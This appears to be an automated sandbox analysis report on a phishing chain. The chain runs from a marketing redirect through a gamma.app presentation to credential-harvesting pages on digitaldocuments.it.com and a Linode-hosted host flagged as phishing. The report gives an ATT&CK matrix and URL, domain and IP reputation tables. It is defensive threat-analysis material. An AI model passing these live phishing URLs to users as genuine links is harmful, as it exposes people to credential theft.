    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Scripting
    1
    Extra Window Memory Injection
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    File Deletion
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Extra Window Memory Injection
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://public-usa.mkt.dynamics.com/api/orgs/f8d62d3a-5b03-f011-b015-6045bd003905/r/FMPIXkRqqkmv-j_Li7QBAAEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fgamma.app%252Fdocs%252FJanel-Group-Completed-Document-x686r1ir4nghubz%253Fmode%253Dpresent%2523card-an1daph37h4un5p%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%220%22%3Anull%7D%7D&digest=O1MpDB0efooTe4PN%2BrbvabY6GTxgYZEijI2csju%2FBYg%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15ee0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://gamma.app/_next/static/chunks/main-5cbe58b6145af398.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/6852-30334c7472d0b470.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/2edb282b-c727a725ba9cab5d.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/9695-8f8ecdaf663cd4dd.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/996-b1f03589c07bff77.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/2445-2cebfc2d3c10f6c8.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/5966-1eaa7198d39fb727.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/9863-c78addf4281ddbfa.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb401000%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/12-c25ec07ff90a914d.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/572-26a6ed58c4920db8.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/pages/_app-37f49d3b6c419859.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/b155a556-6216235a369a735d.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/316-91fc125afa02f5ee.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/b13ba9de-693ee4b2b0cb0b28.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/7762-42f8cc94865ab3c9.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/3589-9680b5f77c624cec.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/7811-95fc21fe63dec224.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/b4d7d80c-b21e42481057053e.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/4324-58e867c6ffdd9831.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/9006-f6aba7c581008a42.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/64bbefcc-ad34eaf1d0f1c936.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/9b583bcd-e94a9f27afcc219c.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/css/f8b783c6ab1b2b30.css?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/d08a6a05-cd94e662b24272fc.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/6953-71c1fc7276963d58.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/webpack-035e660fd527d215.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/4787-9b5513938716add8.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://public-usa.mkt.dynamics.com/api/orgs/f8d62d3a-5b03-f011-b015-6045bd003905/r/test0%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/8325-4eb976cbb20bec79.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/framework-89ee881bc4e530f4.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/6980-3b5a299f0e1e01a2.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/998ccc15-d28324c84824644b.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/995-984ec3894744e0be.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/ad54e6ef-c1497d83c32edce5.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/6267-0f348a7fac09425b.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/a29ae703-7accb437ac3a87e9.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/3641-46713cb4c5d1216e.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/5884-117f0ad769ed640f.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://public-usa.mkt.dynamics.com/api/orgs/f8d62d3a-5b03-f011-b015-6045bd003905/cp/FMPIXkRqqkmv-j_Li7QBADzIXkbYlRhOtaq-qsAgDFg0%Avira URL Cloudsafe
    https://gamma.app/_next/static/css/d87801e5487946cc.css?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/8c469d57-125fc4e271dbee1b.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/5adc83ef-bcbc74c04583414c.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/4327-a439db94fcb11d52.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/1035ef44-a82a0e0646431fa5.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/9680-e3c4e12efd5d6c79.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/659-8a6828fad9a08284.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/93656207-5a8710788d43745e.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/91bbf309-32a6ed56d98fa368.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/69bd6bf3-8eac31bce3de269a.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/b779bb5e-79de22188ac69032.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/9786-8aee26c1eec5d36a.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/1786-a1cc54383f32c7ea.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/6113-088aa42ef101225d.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/8766-87c6e55349e9bebe.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/9639-5367407e5eee259b.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/8495-73c6d4d8f3c3ec48.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/1368-a34fc175a13a2b77.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/3251-1e5b95673f45dfa7.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/847-80bc03112a432dd0.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/KSZpz2RxLtBUY3-TtqqO6/_ssgManifest.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/1970-fb7b0eada1a1d383.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/KSZpz2RxLtBUY3-TtqqO6/_buildManifest.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/4055-15efd5d6b1df4e7d.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/pages/docs/%5BdocId%5D-f58083b0fd70f2d6.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/8911-824b40cefe500108.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/9989-f77016503ce7c2d8.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/4229-b14fe1f0c105af0b.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/7413e8b9.26789ad7eaab3ff4.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/9484.2d145ec231909a76.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://imgproxy.gamma.app/resize/quality:80/resizing_type:fit/width:2000/https://cdn.gamma.app/ad3wkkb5l6oao37/b0d22c7603704386be6a681832a58090/original/photo_5848101176623614206_y.jpg0%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/9015.3da411409f75d0c1.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://js.intercomcdn.com/frame-modern.a4c0ff37.js0%Avira URL Cloudsafe
    https://app.launchdarkly.com/sdk/evalx/61e83cfd8ac5a016e6f0d0b6/contexts/eyJraW5kIjoibXVsdGkiLCJ1c2VyIjp7ImtleSI6ImxkX2Fub255bW91c191c2VyIiwiYW5vbnltb3VzIjp0cnVlLCJpc0dhbW1hRTJFIjpmYWxzZSwiaXNHYW1tYVVzZXIiOmZhbHNlLCJvcmdJZCI6Im5vX29yZ19pZCIsImlzTW9iaWxlRGV2aWNlIjpmYWxzZSwiZGVwbG95VGltZSI6MTc0MjI0ODQxMzY1OCwiZGVwbG95bWVudEhhc2giOiI5YnF4aGthNWQifX0?withReasons=true0%Avira URL Cloudsafe
    https://clientstream.launchdarkly.com/eval/61e83cfd8ac5a016e6f0d0b6/eyJraW5kIjoibXVsdGkiLCJ1c2VyIjp7ImtleSI6ImxkX2Fub255bW91c191c2VyIiwiYW5vbnltb3VzIjp0cnVlLCJpc0dhbW1hRTJFIjpmYWxzZSwiaXNHYW1tYVVzZXIiOmZhbHNlLCJvcmdJZCI6Im5vX29yZ19pZCIsImlzTW9iaWxlRGV2aWNlIjpmYWxzZSwiZGVwbG95VGltZSI6MTc0MjI0ODQxMzY1OCwiZGVwbG95bWVudEhhc2giOiI5YnF4aGthNWQifSwid29ya3NwYWNlIjp7ImtleSI6ImFkM3dra2I1bDZvYW8zNyIsIm5hbWUiOiJNSUNIQUVMIEpPSE5TT04ncyBXb3Jrc3BhY2UiLCJwbGFuIjoicHJvIn19?withReasons=true0%Avira URL Cloudsafe
    https://app.launchdarkly.com/sdk/evalx/61e83cfd8ac5a016e6f0d0b6/contexts/eyJraW5kIjoibXVsdGkiLCJ1c2VyIjp7ImtleSI6ImxkX2Fub255bW91c191c2VyIiwiYW5vbnltb3VzIjp0cnVlLCJpc0dhbW1hRTJFIjpmYWxzZSwiaXNHYW1tYVVzZXIiOmZhbHNlLCJvcmdJZCI6Im5vX29yZ19pZCIsImlzTW9iaWxlRGV2aWNlIjpmYWxzZSwiZGVwbG95VGltZSI6MTc0MjI0ODQxMzY1OCwiZGVwbG95bWVudEhhc2giOiI5YnF4aGthNWQiLCJicm93c2VyIjp7Im5hbWUiOiJDaHJvbWUiLCJ2ZXJzaW9uIjoiMTM0LjAuMC4wIn0sImxvY2FsZSI6ImVuLVVTIiwibG9jYXRpb24iOnsiY2l0eSI6IiIsImNvdW50cnkiOiJVUyIsImxhdGl0dWRlIjozNy43NTEsImxvbmdpdHVkZSI6LTk3LjgyMn19fQ?withReasons=true0%Avira URL Cloudsafe
    https://gytqwxqrwvsvqlclcdpq.digitaldocuments.it.com/0%Avira URL Cloudsafe
    https://clientstream.launchdarkly.com/eval/61e83cfd8ac5a016e6f0d0b6/eyJraW5kIjoibXVsdGkiLCJ1c2VyIjp7ImtleSI6ImxkX2Fub255bW91c191c2VyIiwiYW5vbnltb3VzIjp0cnVlLCJpc0dhbW1hRTJFIjpmYWxzZSwiaXNHYW1tYVVzZXIiOmZhbHNlLCJvcmdJZCI6Im5vX29yZ19pZCIsImlzTW9iaWxlRGV2aWNlIjpmYWxzZSwiZGVwbG95VGltZSI6MTc0MjI0ODQxMzY1OCwiZGVwbG95bWVudEhhc2giOiI5YnF4aGthNWQifX0?withReasons=true0%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/1743016e.cafbf12bf63073bf.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://gamma.app/_next/static/chunks/4483.b1e22900348e682f.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://dcumentfile.us-southeast-1.linodeobjects.com/favicon.ico100%Avira URL Cloudphishing
    https://gamma.app/_next/static/chunks/3d35b88c.89c8cbcdea31a14b.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB450%Avira URL Cloudsafe
    https://js.intercomcdn.com/vendors~app-modern.ea92d9fd.js0%Avira URL Cloudsafe
    https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638778966462075130.YjYyYTE5NjEtNzNjZC00ZWVjLTlmNWEtZTc0MTQ1ZTliZThlMzA5MzU3YzQtYTcwZi00MGM4LWFiMjItYTdhZjYzYmRmMzNh&ui_locales=en-US&mkt=en-US&client-request-id=93e1aafa-c131-4cd6-a0d3-880abb03e634&state=LprAaNLdv9qrQ_HpSNBFIwg23A3EZq7xqhLsg3F9y4a5FCgOITc7vSQ9FkNAS8aKXgyTAW222JkKqXumtf9KkoHqhw8jU52tGuZmuKF1kQ3O8dyzl_ClDCAy3pmPWbCAEBRGUFF5WCb6etjZVZ1GFovo3ZVgBNZ2Hp3vTXTuDRUpP7GOQg2TsaI0UFfDlnYyUvSjHBF6ylzyZuOUNaZkmzcLvZmmfUFtjPsSZGfJTBkLULMf7OhKGoUx0CvRbBjxOCkjiPYBKfP-w1_3TvibNQ&x-client-SKU=ID_NET8_0&x-client-ver=8.3.0.00%Avira URL Cloudsafe
    https://office.com/login0%Avira URL Cloudsafe
    https://wordl.digitaldocuments.it.com/google.php0%Avira URL Cloudsafe
    https://js.intercomcdn.com/app-modern.d84b507f.js0%Avira URL Cloudsafe
    https://a.nel.cloudflare.com/report/v4?s=hanENjgYT39DxVCKn8ti8oBkevRR%2BTNs9cWEDL47BVXtd%2FXA4srns2Dhoy8Ulw%2Bo62nP4oZ%2BBd8%2Bh%2FhrIM5xALTut2e%2BqqfFdmmF%2BNx1D1ZRs2LjP%2FWRjy1cNfn8GbaqCi4%3D0%Avira URL Cloudsafe
    https://js.intercomcdn.com/app~tooltips-modern.67d65220.js0%Avira URL Cloudsafe
    https://7601613767-1317754460.cos.ap-bangkok.myqcloud.com/attach%2Fbootstrap.min.js0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    cdn.jsdelivr.net.cdn.cloudflare.net
    104.18.186.31
    truefalse
      high
      s-part-0044.t-0009.fb-t-msedge.net
      13.107.253.72
      truefalse
        high
        static.cloudflareinsights.com
        104.16.80.73
        truefalse
          high
          us-southeast-1.linodeobjects.com.akadns.net
          194.195.215.57
          truefalse
            unknown
            cos.ap-bangkok.myqcloud.com
            43.128.193.190
            truefalse
              high
              events.launchdarkly.com
              54.161.6.100
              truefalse
                high
                a1874.dscg1.akamai.net
                95.101.54.121
                truefalse
                  high
                  assets.churnkey.co
                  172.67.71.250
                  truefalse
                    high
                    www.tm.a.prd.aadg.trafficmanager.net
                    40.126.32.76
                    truefalse
                      high
                      cdn.gamma.app
                      104.18.10.200
                      truefalse
                        high
                        canny.io
                        18.66.147.27
                        truefalse
                          high
                          code.jquery.com
                          151.101.130.137
                          truefalse
                            high
                            wordl.digitaldocuments.it.com
                            104.21.48.1
                            truefalse
                              unknown
                              gamma.app
                              104.18.10.200
                              truefalse
                                high
                                cdnjs.cloudflare.com
                                104.17.25.14
                                truefalse
                                  high
                                  office.com
                                  13.107.6.156
                                  truefalse
                                    unknown
                                    www.google.com
                                    142.250.186.132
                                    truefalse
                                      high
                                      nexus-websocket-a.intercom.io
                                      34.237.73.95
                                      truefalse
                                        high
                                        cdn.iframe.ly
                                        108.138.7.117
                                        truefalse
                                          high
                                          c3.shared.global.fastly.net
                                          151.101.194.217
                                          truefalse
                                            high
                                            js.intercomcdn.com
                                            18.245.46.55
                                            truefalse
                                              high
                                              logx.optimizely.com
                                              34.49.241.189
                                              truefalse
                                                high
                                                stackpath.bootstrapcdn.com
                                                104.18.11.207
                                                truefalse
                                                  high
                                                  event-tracking-prod-1378027167.us-east-2.elb.amazonaws.com
                                                  18.224.12.105
                                                  truefalse
                                                    high
                                                    a.nel.cloudflare.com
                                                    35.190.80.1
                                                    truefalse
                                                      high
                                                      e329293.dscd.akamaiedge.net
                                                      95.101.182.98
                                                      truefalse
                                                        high
                                                        widget.intercom.io
                                                        108.138.26.124
                                                        truefalse
                                                          high
                                                          clientstream-ga.launchdarkly.com
                                                          13.248.151.210
                                                          truefalse
                                                            high
                                                            o698378.ingest.sentry.io
                                                            34.120.195.249
                                                            truefalse
                                                              high
                                                              maxcdn.bootstrapcdn.com
                                                              104.18.10.207
                                                              truefalse
                                                                high
                                                                b-0004.b-msedge.net
                                                                13.107.6.156
                                                                truefalse
                                                                  high
                                                                  prdia888eus0aks.mkt.dynamics.com
                                                                  52.146.76.30
                                                                  truefalse
                                                                    high
                                                                    api.gamma.app
                                                                    104.18.10.200
                                                                    truefalse
                                                                      high
                                                                      api-iam.intercom.io
                                                                      34.233.102.105
                                                                      truefalse
                                                                        high
                                                                        cdn.optimizely.com
                                                                        104.18.66.57
                                                                        truefalse
                                                                          high
                                                                          gytqwxqrwvsvqlclcdpq.digitaldocuments.it.com
                                                                          104.21.112.1
                                                                          truefalse
                                                                            unknown
                                                                            a187838077.cdn.optimizely.com
                                                                            104.18.66.57
                                                                            truefalse
                                                                              high
                                                                              imgproxy.gamma.app
                                                                              104.18.11.200
                                                                              truefalse
                                                                                high
                                                                                a1988.dscg1.akamai.net
                                                                                95.101.54.200
                                                                                truefalse
                                                                                  high
                                                                                  s-part-0032.t-0009.t-msedge.net
                                                                                  13.107.246.60
                                                                                  truefalse
                                                                                    high
                                                                                    public-usa.mkt.dynamics.com
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      high
                                                                                      www.office.com
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        unknown
                                                                                        cdn.jsdelivr.net
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          high
                                                                                          dcumentfile.us-southeast-1.linodeobjects.com
                                                                                          unknown
                                                                                          unknowntrue
                                                                                            unknown
                                                                                            7601613767-1317754460.cos.ap-bangkok.myqcloud.com
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              unknown
                                                                                              use.typekit.net
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                high
                                                                                                clientstream.launchdarkly.com
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  high
                                                                                                  app.launchdarkly.com
                                                                                                  unknown
                                                                                                  unknownfalse
                                                                                                    high
                                                                                                    aadcdn.msftauth.net
                                                                                                    unknown
                                                                                                    unknownfalse
                                                                                                      high
                                                                                                      events.api.gamma.app
                                                                                                      unknown
                                                                                                      unknownfalse
                                                                                                        high
                                                                                                        p.typekit.net
                                                                                                        unknown
                                                                                                        unknownfalse
                                                                                                          high
                                                                                                          login.microsoftonline.com
                                                                                                          unknown
                                                                                                          unknownfalse
                                                                                                            high
                                                                                                            NameMaliciousAntivirus DetectionReputation
                                                                                                            https://gamma.app/_next/static/chunks/main-5cbe58b6145af398.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015false
                                                                                                              high
                                                                                                              https://gamma.app/_next/static/chunks/6852-30334c7472d0b470.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://gamma.app/_next/static/chunks/3251-1e5b95673f45dfa7.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://gamma.app/_next/static/chunks/6113-088aa42ef101225d.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://gamma.app/_next/static/chunks/9863-c78addf4281ddbfa.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                                                                                                high
                                                                                                                https://gamma.app/_next/static/chunks/9015.3da411409f75d0c1.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://gamma.app/_next/static/chunks/2445-2cebfc2d3c10f6c8.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://api-iam.intercom.io/messenger/web/launcher_settingsfalse
                                                                                                                  high
                                                                                                                  https://gamma.app/_next/static/chunks/7413e8b9.26789ad7eaab3ff4.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://gamma.app/_next/static/chunks/12-c25ec07ff90a914d.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://events.api.gamma.app/v1/ifalse
                                                                                                                    high
                                                                                                                    https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100false
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://app.launchdarkly.com/sdk/evalx/61e83cfd8ac5a016e6f0d0b6/contexts/eyJraW5kIjoibXVsdGkiLCJ1c2VyIjp7ImtleSI6ImxkX2Fub255bW91c191c2VyIiwiYW5vbnltb3VzIjp0cnVlLCJpc0dhbW1hRTJFIjpmYWxzZSwiaXNHYW1tYVVzZXIiOmZhbHNlLCJvcmdJZCI6Im5vX29yZ19pZCIsImlzTW9iaWxlRGV2aWNlIjpmYWxzZSwiZGVwbG95VGltZSI6MTc0MjI0ODQxMzY1OCwiZGVwbG95bWVudEhhc2giOiI5YnF4aGthNWQifX0?withReasons=truefalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://imgproxy.gamma.app/resize/quality:80/resizing_type:fit/width:2000/https://cdn.gamma.app/ad3wkkb5l6oao37/b0d22c7603704386be6a681832a58090/original/photo_5848101176623614206_y.jpgfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
